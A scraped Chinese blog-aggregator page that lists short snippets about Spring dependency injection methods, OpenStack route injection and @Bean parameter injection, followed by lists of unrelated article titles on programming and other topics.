欢迎关注方志朋的博客,回复"666"获面试宝典 前言 Spring 正如其名字,给开发者带来了春天,Spring 是为解决企业级应用开发的复杂性而设计的一款框架,其设计理念就是:简 ...
- spring常用的三种依赖注入方式
平常的java开发中,程序员在某个类中需要依赖其它类的方法,则通常是new一个依赖类再调用类实例的方法,这种开发存在的问题是new的类实例不好统一管理,spring提出了依赖注入的思想,即依赖类不由程 ...
- Openstack-L 路由注入方式
目录 目录 前言 从 Commands 到 Action 操作函数 前言 Openstack 新旧版本提供了不同的路由注入方式,也就是 Route Module 的代码方式不同,就二次开发而言用那一种 ...
- @Bean修饰的方法参数的注入方式
方法参数默认注入方式为Autowired,即先根据类型匹配,若有多个在根据名称进行匹配. 1:复杂类型可以通过@Qualifier(value="XXX")限定; 2:对于普通类型 ...
- spring(一):spring IoC的注入方式总结
前言:谈谈对springIOc的理解,两张图很好的阐述了springIoc容器的作用. 传统应用程序示意图.jpg IoC容器后程序结构示意图.jpg springIoC容器注入方式有set注入,构造 ...
最新文章
- 数据通信技术(十一:无中继的DHCP配置(ZTE))
- 裴健:搜索皆智能,智能皆搜索
- C#方法带不确定个数参数
- 1.	变量提升 2.	条件语句 3.	循环语句 弹出框的三种形式 If条件的种类...
- PyCharm喜好设置
- bzoj3732-Network【Kruskal重构树模板】
- 大学计算机一级b笔记,全国计算机等级一级B Excel考试整理笔记
- 数组 this.setData快捷赋值
- BZOJ5466 NOIP2018保卫王国(倍增+树形dp)
- 08TensorFlow2.0基础--8.4部分采样
- 物流系统开发中,Dev倥件的使用
- ROR no such file to load -- sqlite3 错误解决方法
- 190606每日一句
- python百度文库下载器_真正百度文库免费下载,比冰点文库下载器还更牛x!
- 软件概要设计说明书—模板
- aruba交换机配置命令_aruba配置手册
- 解析人类的四次工业革命
- QQ自动添加好友脚本工具分享
- 预测数值型数据:回归
- 马云:30年后每对年轻人要养8个老人 管理5套房子
热门文章
- 监督学习 | 朴素贝叶斯之Sklearn实现
- Adobe illustrator 抽丝剥茧选中多个点 - 连载 13
- 一个老干部对即将从政的儿子的赠言
- 怎么给图片降噪?WidsMob Denoise 图片降噪教程
- number java_java中Number Math 类方法
- 1.4编程基础之逻辑表达式与条件分支 12 骑车与走路
- java 获取键盘输入法_Java中接收键盘输入的三种方法
- Java笔记-AES加解密(PKCS7padding可用)
- Qt笔记-Q_UNUSED解决编译器unused paramenter告警
- 计算机图形几个小常识